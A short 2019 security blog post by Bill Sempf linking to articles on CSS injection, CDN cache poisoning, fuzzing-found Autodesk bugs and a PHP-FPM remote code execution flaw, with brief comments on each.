by Bill Sempf
27. October 2019 08:28
Here's an interesting article on some non-JavaScript Cross-Site Scripting vectors.
https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
Timely history lesson about the gradual movement of web application from primarily server-side to primarily client-side:
https://medium.com/young-coder/an-illustrated-beginners-guide-to-server-side-and-client-side-code-723cbb1db9ea
This isn't as new of an idea as the authors would like us to believe, but it is a good PoC of the CDN-related cache poisoning attack:
https://thehackernews.com/2019/10/cdn-cache-poisoning-dos-attack.html?m=1
Public disclosure of some bugs in AutoDesk discovered by binary fuzzing. Good way to get a look into this kind of testing - look breakdowns of CVEs.
https://fuzzit.dev/2019/10/25/discovery-and-analysis-of-2-dos-vulnerabilities-in-autodesk-fbx-1-unpatched/
PHP has a vector for remote code execution (combined with other known flaws) to patch if you can! Worth a read for the process, as well.
https://thehackernews.com/2019/10/nginx-php-fpm-hacking.html
That's the news, folks.
4ff09271-c8e8-4e83-8a27-ac7c50cb60e3|0|.0|96d5b379-7e1d-4dac-a6ba-1e50db561b04
Tags: